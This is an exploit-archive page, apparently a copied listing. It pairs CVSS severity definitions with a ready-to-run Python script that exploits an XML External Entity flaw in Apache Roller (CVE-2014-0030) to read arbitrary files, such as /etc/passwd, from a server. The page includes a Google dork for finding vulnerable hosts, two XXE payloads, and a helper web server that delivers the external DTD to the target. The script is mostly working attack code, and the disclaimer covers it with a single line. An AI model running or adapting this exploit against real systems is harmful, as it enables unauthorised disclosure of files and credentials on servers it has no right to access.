The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
None
A
There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
Below is a copy: Apache Roller 5.0.3 XML Injection / File Disclosure
# Exploit Title: Apache Roller 5.0.3 - XML External Entity Injection (File Disclosure)
# Google Dork: intext:"apache roller weblogger version {vulnerable_version_number}"
# Date: 2018-09-05
# Exploit Author: Marko Jokic
# Contact: http://twitter.com/_MarkoJokic
# Vendor Homepage: http://roller.apache.org/
# Software Link: http://archive.apache.org/dist/roller/
# Version: < 5.0.3
# Tested on: Linux Ubuntu 14.04.1
# CVE : CVE-2014-0030
# This exploit lets you read almost any file on a vulnerable server via XXE vulnerability.
# There are two types of payload this exploit is able to use, 'SIMPLE' & 'ADVANCED'.
# 'SIMPLE' payload will work in most cases and will be used by default, if
# server errors out, use 'ADVANCED' payload.
# 'ADVANCED' payload will start local web server and serve malicious XML which
# will be parsed by a target server.
# To successfully perform attack with 'ADVANCED' payload, make sure that port
# you listen on (--lport flag) is accessible out of the network.
#!/usr/bin/env python
import SimpleHTTPServer
import SocketServer
import argparse
import sys
import threading
from xml.etree import ElementTree
import urllib3
import requests
SIMPLE_PAYLOAD = """<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file://{}">]>
<methodCall>
<methodName>&xxe;</methodName>
</methodCall>
"""
ADVANCED_PAYLOAD = """<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY % start "<![CDATA[">
<!ENTITY % xxe SYSTEM "file://{}">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "{}">
%dtd;
]>
<methodCall>
<methodName>&all;</methodName>
</methodCall>
"""
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class MyHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('<!ENTITY all "%start;%xxe;%end;">')
def check_exploit(host):
response = requests.post(host + "/roller-services/xmlrpc", verify=False)
if response.status_code == 200:
return True
return False
def exploit(host, payload):
response = requests.post(host + "/roller-services/xmlrpc", data=payload, verify=False)
xml_tree = ElementTree.fromstring(response.text)
parsed_response = xml_tree.findall("fault/value/struct/member")[1][1].text
print parsed_response
def start_web_server(port):
handler = MyHandler
httpd = SocketServer.TCPServer(('', port), handler, False)
httpd.allow_reuse_address = True
httpd.server_bind()
httpd.server_activate()
httpd.handle_request()
httpd.shutdown()
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-u', metavar="URL", dest="url", required=True, help="Target URL")
parser.add_argument('-f', metavar='FILE', dest="file", required=False, default="/etc/passwd", help="File to read from server")
parser.add_argument('--lhost', required='--rport' in sys.argv, help="Your IP address for http web server")
parser.add_argument('--lport', type=int, required='--rhost' in sys.argv, help="Port for web server to listen on")
args = parser.parse_args()
host = args.url
full_file_path = args.file
advanced = False
lhost = args.lhost
lport = args.lport
if lport is not None and lport is not None:
advanced = True
check = check_exploit(host)
if check:
if advanced:
th = threading.Thread(target=start_web_server, args=(lport,))
th.daemon = True
th.start()
payload = ADVANCED_PAYLOAD.format(full_file_path, "http://{}:{}".format(lhost, lport))
else:
payload = SIMPLE_PAYLOAD.format(full_file_path)
exploit(host, payload)
else:
print "[-] TARGET IS NOT VULNERABLE!"
main()
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum